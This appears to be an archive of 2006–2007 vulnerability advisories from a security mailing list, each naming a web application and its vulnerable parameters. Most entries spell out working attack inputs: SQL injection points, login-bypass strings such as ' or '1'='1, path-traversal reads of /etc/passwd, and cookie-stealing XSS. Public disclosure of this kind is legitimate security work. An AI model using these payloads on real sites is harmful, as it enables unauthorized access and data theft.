php web portail [remote file include local file include]

2007-02-01 Thread saps . audit
php web portail [remote file include local file include] download site: https://sourceforge.net/project/showfiles.php?group_id=178400 product:php web portail bug: remote file include local file include risk : high local file include :

FishCart [injection sql]

2007-01-22 Thread saps . audit
vendor site: http://fishcart.org/ product :fish cart bug:injection sql risk : medium injection sql : /display.php?cartid=200701210157208zid=1lid=1olimit=5cat=key1=nlst=yolst='[sql] ( change the cartid value with yours ) laurent gaffie http://s-a-p.ca/ contact: [EMAIL PROTECTED]

phpbb 2.0.x [xss]

2006-12-07 Thread saps . audit
vendor site:http://phpbb.com/ product:phpbb bug:xss risk:low An xss post has been discovered in phpbb, the impact of this attack is very low, because it's more a bug than a vulnerability. An authenticated user can execute some html code in his private message box, by sending a message to an

Re: Re: [Aria-Security Team] uGestBook SQL Injection Vuln

2006-12-05 Thread saps . audit
well actually there's no injection sql in the var : -page -block it's just an error for type mismatch ... ( Microsoft VBScript runtime error '800a000d' Type mismatch: '[string: query_blabla]' i think those guys ( aria ) don't understand the difference between an error sql and an injection

Re: EasyPage Portal ( all ver )SQL Injection

2006-12-05 Thread saps . audit
[ Bug : SQL Injection Input string By : Hackerz.ir Link : http://hide_your_url_plz.com ] -- this is a simple error ... ( try with /default.aspx?page=Documentapp=Documents ) there's totally no injection in this case

Rapid Classified v3.1 [multiple xss (get) injection sql]

2006-11-21 Thread saps . audit
vendor site: http://www.4u2ges.com/ product : Rapid Classified v3.1 bug: multiple xss (get) injection sql risk : medium injection sql : /viewad.asp?id='[sql] xss : /reply.asp?id=[xss] /view_print.asp?id=[xss] /search.asp?categoryName=1SH1=[xss] /reply.asp?id=5012081548011name=[xss]

JiRos Links Manager[injection sql xss permanent]

2006-11-21 Thread saps . audit
vendor site:http://www.jiros.net/ product:JiRos Links Manager bug: injection sql xss risk : medium injection sql: /openlink.asp?LinkID='[sql] /viewlinks.asp?CategoryID='[sql] xss permanent (post): in: /submitlink.asp -Link Name: -Link URL: -Link Image: -Link Description: those xss are

The Classified Ad System [multiple xss injection sql]

2006-11-21 Thread saps . audit
vendor site: http://www.rockfordarea.com/ product : The Classified Ad System bug: multiple xss (get) injection sql risk : medium injection sql (get): /default.asp?action=viewmain='[sql] injection sql (post) : just post your query into the search engine xss :

creadirectory [injection sql xss]

2006-11-21 Thread saps . audit
vendor site: http://www.creascripts.com/ product:creadirectory bug: injection sql xss risk : medium injection sql: /search.asp?search=1submit=Searchcategory='[sql] xss: /addlisting.asp?cat=[xss] /search.asp?search=[xss] laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL

klf-realty [injection sql]

2006-11-21 Thread saps . audit
vendor site:http://klf-design.com/ product :klf-realty bug:injection sql risk : medium injection sql : /search_listing.asp?category='[sql] /detail.asp?property_id='[sql] /search_listing.asp?agent='[sql] laurent gaffie benjamin mosse http://s-a-p.ca/ contact: [EMAIL PROTECTED]

Link Exchange Lite [injection sql]

2006-11-21 Thread saps . audit
vendor site: http://softacid.net/ product:Link Exchange Lite bug: injection sql risk : high injection sql (post) : /search.asp post your sql query into the search engine field injection sql (get): /linkslist.asp?psearch='[sql] laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL

Rialto 1.6[admin login bypass multiples injections sql]

2006-11-21 Thread saps . audit
vendor site: http://www.grandora.com/ product : Rialto 1.6 bug:multiples injection sql , login bypass , xss risk : high ! admin login bypass : /admin/default.asp username:' or '1' = '1 passwd: ' or '1' = '1 injection sql : /listfull.asp?ID='[sql] /listmain.asp?cat='[sql]

Classified System [injection sql]

2006-11-21 Thread saps . audit
vendor site: http://www.vspin.net/ product :Classified System bug:injection sql risk : medium injection sql : /cat.asp?cat='[sql] /search.asp?in=ykeyword='[sql] /search.asp?in=ykeyword=1submit=Searchorder='[sql] /search.asp?in=ykeyword=1submit=Searchorder=tbl_classads.col_idsort='[sql]

eClassifieds [injection sql]

2006-11-21 Thread saps . audit
vendor site: http://enthrallweb.com/ product : eClassifieds bug:injection sql risk : medium injection sql : /ad.asp?AD_ID='[sql] /ad.asp?cat_id='[sql] /dircat.asp?cid='[sql] /dirSub.asp?sid='[sql] /ad.asp?cat_id=35sub_id='[sql] /ad.asp?cat_id=35sub_id=102ad_id='[sql] laurent gaffié benjamin

Re: [ GLSA 200611-11 ] TikiWiki: Multiple vulnerabilities

2006-11-21 Thread saps . audit
I've already posted an advisory about that here: http://www.securityfocus.com/archive/1/450268 regards laurent gaffié http://s-a-p.ca/

aBitWhizzy [local file include]

2006-11-21 Thread saps . audit
vendor site: http://www.unverse.net/abitwhizzy/ product : aBitWhizzy bug:local file include global risk : high http://site.com/abitwhizzy.php?f=../../../../../../../etc/passwd laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL PROTECTED]

Vikingboard (0.1.2) [ multiples vulnerability ]

2006-11-18 Thread saps . audit
vendor site:http://vikingboard.com/ product:Vikingboard (0.1.2) bug:local file include multiples permanent xss risk:medium error sql : /members.php?s=-80 xss permanent : - in private message , an attacker can send a pm to an administrator with some javascript into the subject field an get

20/20 auto gallery [ multiples injection sql ]

2006-11-17 Thread saps . audit
vendor site:http://www.2020autogallery.com/ product:20/20 auto gallery bug:injection sql global risk:high injection sql get : http://site.com/vehiclelistings.asp?vehicleID='[sql] http://site.com/vehiclelistings.asp?categoryID_list='[sql] http://site.com/vehiclelistings.asp?sale_type='[sql]

20/20 real estate [ multiples injection sql ]

2006-11-17 Thread saps . audit
vendor site:http://www.2020applications.com/ product:20/20 real estate bug:injection sql risk:high injection sql get : /listings.asp?itemID='[sql] /listings.asp?peopleID='[sql] /f-google_earth.asp?itemID='[sql] /f-email.asp?strPeopleID=1itemID='[sql]

Aspmforum [ multiples injection sql (getpost)]

2006-11-17 Thread saps . audit
vendor site:http://www.kervancilar.com/ product:Aspmforum bug:injection sql (get post) risk:high injection sql get : /forum.asp?baslik='[sql] /forum2.asp?baslik=2soruid='[sql] /kullanicilistesi.asp?ak=at=harf='[sql] /kullanicilistesi.asp?at=baslayanak='[sql] once logged :

20/20 datashed [ multiples injection sql ]

2006-11-17 Thread saps . audit
vendor site:http://www.2020applications.com/ product:20/20 datashed bug:injection sql risk:high injection sql get : /f-email.asp?strPeopleID=1itemID='[sql] /listings.asp?peopleID='[sql] /listings.asp?sort_order='[sql] laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL

Infinitytechs Restaurants CM

2006-11-17 Thread saps . audit
product:Infinitytechs Restaurants CM bug:injection sql risk:medium injection sql: /rating.asp?id='[sql] /meal_rest.asp?mealid='[sql] /res_details.asp?resid='[sql] laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL PROTECTED]

E-commerce Kit 1 PayPal Edition [ injection sql ]

2006-11-16 Thread saps . audit
vendor site:http://www.sitesoutlet.com/ product:E-commerce Kit 1 PayPal Edition bug:injection sql risk:medium injection sql : http://site.com/PATH/catalogue.asp?keyword='[sql] http://site.com/PATH/catalogue.asp?cid='[sql] http://site.com/PATH//viewDetail.asp?pid='[sql] laurent gaffié benjamin

MetaCart e-Shop [multiples injection sql (get post)]

2006-11-16 Thread saps . audit
vendor site:http://metalinks.com/ product:MetaCart e-Shop bug:injection sql risk:medium injection sql (get) : http://site.com/metacart/productsByCategory.asp?intCatalogID='[sql] http://site.com/metacart/product.asp?intProdID='[sql] injection sql(post) : 1

PhpMyAdmin all version [multiples vulnerability]

2006-11-16 Thread saps . audit
vendor site:http://phpmyadmin.net/ product:PhpMyAdmin all version bug: xss permanent full path disclosure global risk:high xss post : 1) create a table , with whatever name , when it's done , go to operation (/db_operations.php) and add a comment on your table with:

eShopping Cart [injection sql]

2006-11-16 Thread saps . audit
vendor site:http://www.enthrallweb.com/ product:eShopping Cart bug:injection sql risk:medium injection sql : http://site.com/reviews.asp?ProductID='[sql] http://site.com/subProducts.asp?cat_id='[sql] http://site.com/productdetail.asp?ProductID='[sql]

CandyPress Store[ multiples injection sql ]

2006-11-16 Thread saps . audit
vendor site:http://www.candypress.com/ product:CandyPress Store bug:injection sql risk:medium injection sql (get) : http://site.com/sa3.5.2.14/scripts/openPolicy.asp?policy='[sql] http://site.com/sa3.5.2.14/scripts/prodList.asp?brand='[sql] laurent gaffié benjamin mossé http://s-a-p.ca/

ASP Cart [multiples injection sql (post get)]

2006-11-16 Thread saps . audit
vendor site: http://www.aspcart.com product: ASP Cart bug: multiples injection sql post get global risk: high ! injection get : http://site.com/prodetails.asp?prodid='[sql] injection (post) : 1)http://site.com/display.asp Variables: /display.asp?page='[sql] 2)http://site.com/addcart.asp

Pilot Cart V.7.2 [ injection sql (post) ]

2006-11-16 Thread saps . audit
vendor site:http://www.pilotcart.com/ product:Pilot Cart V.7.2 bug:injection sql risk:high injection sql(post) : in the search engine: http://site.com/pilot.asp?pg=searchmode=results variables : srch='[sql]searchBy=Products laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL

Active News Manager [ injection sql (postget)]

2006-11-16 Thread saps . audit
vendor site:http://www.dotnetindex.com/ product:Active News Manager bug:injection sql risk:medium injection sql (get) http://site.com/activenews/activeNews_categories.asp?catID='[sql] http://site.com/activeNews_comments.asp?articleID='[sql] injection sql(post) : in the search engine:

Dragon calendar [ login bypass injection sql ]

2006-11-15 Thread saps . audit
vendor site:http://www.dragoninternet.net/ product:Dragon Events Listing bug:login bypass injection sql risk:high login bypass : username: 'or''=' passwd: 'or''=' injection sql (get) http://site.com/event_searchdetail.asp?ID='[sql] http://site.com/venue_detail.asp?VenueID='[sql] laurent

MultiCalendars [ multiples injection sql ]

2006-11-15 Thread saps . audit
vendor site:http://www.expinion.net/ product:MultiCalendars bug:injection sql risk:medium injection sql (get) http://site.com/rss_out.asp?ID=1MODE=1M='[sql] http://site.com/rss_out.asp?ID=1MODE=1M=10Y='[sql] http://site.com/all_calendars.asp?month=11year=2006cate='[sql]

E-Calendar Pro 3.0 [ login bypass injection sql (post)]

2006-11-15 Thread saps . audit
vendor site:http://www.futuretec-soft.com/ product:E-Calendar Pro 3.0 bug:login bypass injection sql post risk:high login bypass : username: 'or''=' passwd: 'or''=' injection sql post: in : /search.asp post your query into the search engine . laurent gaffié benjamin mossé

Inventory Manager [injection sql xss (get)]

2006-11-14 Thread saps . audit
vendor site:http://www.websitedesignsforless.com/ product:Inventory Manager bug:injection sql xss (get) risk:medium injection sql : http://site.com/inventory/inventory/display/imager.asp?pictable='[sql] http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]picfield=[sql]

Evolve Merchant[ injection sql ]

2006-11-14 Thread saps . audit
vendor site:http://www.lynxinternet.com/ product:Evolve Merchant bug:injection sql risk:medium injection sql (get) : http://site.com/viewcart.asp?zoneid='[sql] laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL PROTECTED]

Car Site Manager [injection sql xss (get)]

2006-11-14 Thread saps . audit
Car Site Manager [injection sql xss (get)] vendor site:http://www.mginternet.com/ product:Car Site Manager bug:injection sql risk:medium injection sql : http://site.com/csm/asp/detail.asp?l=p='[sql] http://site.com/csm/asp/listings.asp?l='[sql]

FunkyASP Glossary v1.0 [injection sql]

2006-11-14 Thread saps . audit
vendor site:http://www.funkyasp.co.uk/ product:FunkyASP Glossary v1.0 bug:injection sql risk:medium injection sql : http://www.demo.funkyasp.co.uk/demo/glossary/glossary.asp?alpha='[sql] laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL PROTECTED]

Blogme v3 [admin login bypass xss (post)]

2006-11-14 Thread saps . audit
vendor site:http://www.drumster.net/ product:Blogme v3 bug:login bypass xss (post) risk:high admin login bypass : user : ' or '1' = '1 passwd: 1'='1' ro ' xss post : in: /comments.asp?blog=85 vulnerables fields: - Name - URL - Comments laurent gaffié benjamin mossé http://s-a-p.ca/

Property Site Manager [login bypass ,multiples injection sql xss (get)]

2006-11-14 Thread saps . audit
vendor site:http://www.mginternet.com/ product:Property Site Manager bug:injection sql ,login bypass , xss risk:medium login bypass : just login with : user: 'or''=' passwd: 'or''=' injection sql : http://site.com/asp/detail.asp?l=p='[sql] http://site.com/asp/listings.asp?l='[sql]

A+ Store E-Commerce[ injection sql xss (post) ]

2006-11-14 Thread saps . audit
vendor site:http://www.webinhabit.com/ product:A+ Store E-Commerce bug:injection sql xss post risk:medium injection sql (get) : http://site.com/browse.asp?ParentID='[sql] xss post : in /account_login.asp: username =

A-Cart pro[ injection sql (postget)]

2006-11-14 Thread saps . audit
vendor site:http://www.alanward.net/ product:A-Cart pro bug:injection sql risk:medium injection sql (get) : /category.asp?catcode='[sql] /product.asp?productid='[sql] injection sql (post) : http://site.com/search.asp Variables: /search.asp?search='[sql] ( or just post your query in the

hpecs shopping cart[login bypass injection sql (post)]

2006-11-14 Thread saps . audit
vendor site:http://hpe.net/ product:hpecs shopping cart bug:injection sql risk:high login bypass : username: 'or''=' passwd: 'or''=' injection sql (post) : http://site.com/search_list.asp variables: Hpecs_Find=maingroupsearchstring='[sql] ( or just post your query in the search

Mega Mall [ multiples injection sql full path disclosure ]

2006-11-13 Thread saps . audit
vendor site: http://products.kaonsoftwares.com/ product: mega-mall bug:injection sql full path disclosure language: asp risk: high injection sql (get): http://site.com/mega-mall/product_review.php?t=[sql] http://site.com/mega-mall/product_review.php?t=0productId=[sql]

infinicart [ multiples injection sql xss (post) ]

2006-11-13 Thread saps . audit
vendor site: http://www.ecommercemax.com/ product : infinicart bug: multiples injection sql xss language : asp risk : high injection sql (get): /infinicart-demo/browse_group.asp?groupid=[sql] /infinicart-demo/added_to_cart.asp?productid=[sql] /infinicart-demo/browsesubcat.asp?catid=[sql]

omnistar article manager [multiples injection sql]

2006-11-09 Thread saps . audit
vendor site:http://www.omnistararticle.com/ product :omnistar article manager bug:injection sql risk : high path: /articles/comments.php?article_id='[sql] /articles/article.php?op=savearticle_id='[sql] /articles/pages.php?page_id='[sql] laurent gaffié benjamin mossé http://s-a-p.ca/ contact:

LandShop Real Estate [multiple injection sql xss]

2006-11-09 Thread saps . audit
vendor site: http://www.landshop.gr/ product: LandShop Real Estate bug: multiple injection sql xss risk : high xss (get) : http://site.com/PATH/action/ls.php?lang=enaction=liststart=/textarea'scriptalert(document.cookie)/script

Abarcar Realty Portal [injection sql]

2006-11-08 Thread saps . audit
software:Abarcar product:Realty Portal vendor site : http://www.abarcar.com/ risk : medium /newsdetails.php?neid=[sql] /slistl.php?slid=[sql] /content.php?cat=[sql] laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL PROTECTED]

Portix-PHP [login bypass xss (post)]

2006-11-08 Thread saps . audit
product:Portix-PHP vendor site :http://portix2.be risk : medium log with : username: 'or''=' passwd : 'or''=' xss post on the forum , vulnerable fields : titre auteur laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL PROTECTED]

FreeWebshop =2.2.2 [local file include xss]

2006-11-08 Thread saps . audit
FreeWebshop =2.2.2 severity: high vendor site: http://www.freewebshop.org/ impact: an anonymous user can access any file on the remote server PoC : http://site.com/?page=../../../../../../../../../../etc/passwd%00 http://site.com/index.php?page=../../../../../../../../../../etc/passwd%00 xss

Speedwiki 2.0 Arbitrary File Upload Vulnerability

2006-11-08 Thread saps . audit
product :Speedwiki 2.0 vendor site: http://speedywiki.sourceforge.net/ risk:critical a user logged in , can upload a PHP script on the server , by the upload script , there's actually no upload filter on this cms path : /speedywiki/index.php?upload=1 xss get :

AIOCP =1.3.007 multiples vulnerabilities [sql , remote file include , xss]

2006-11-06 Thread saps . audit
AIOCP =1.3.007 multiples vulnerabilities[injection sql , remote file include , xss] XSS get = - /public/code/cp_forum_view.php?fmode=toptopid=/textarea'scriptalert(document.cookie)/script - /public/code/cp_forum_view.php?fmode=toptopid=53forid=/textarea'scriptalert(document.cookie)/script -

Re: MajorSecurity Advisory #31]Xenis.creator CMS - Multiple Cross Site Scripting and SQL Injection Issues

2006-11-04 Thread saps . audit
there's also one injection sql in : /default.asp?nav=38x47contid=-80 and an error sql here : /default.asp?nav=38x47contid=606lid=-20 http://sap.ca/

IF-CMS multiples XSS vulnerabilities

2006-11-04 Thread saps . audit
vendor site: http://www.rhadrix.com/ risk : low xss = /index.php?rns=/titlescriptalert(document.cookie)/script full path ( array ) /index.php?rns[]= /index.php?pag[]= benjamin mossé laurent gaffié http://s-a-p.ca/

SIMPLOG 0.9.3 injection sql multiple xss

2006-11-03 Thread saps . audit
[[ SIMPLOG 0.9.3 ]] cms website : http://www.simplog.org/ xss: [*] Administration Panel - user.php *Name *URL *Email *API Key *Flickr Email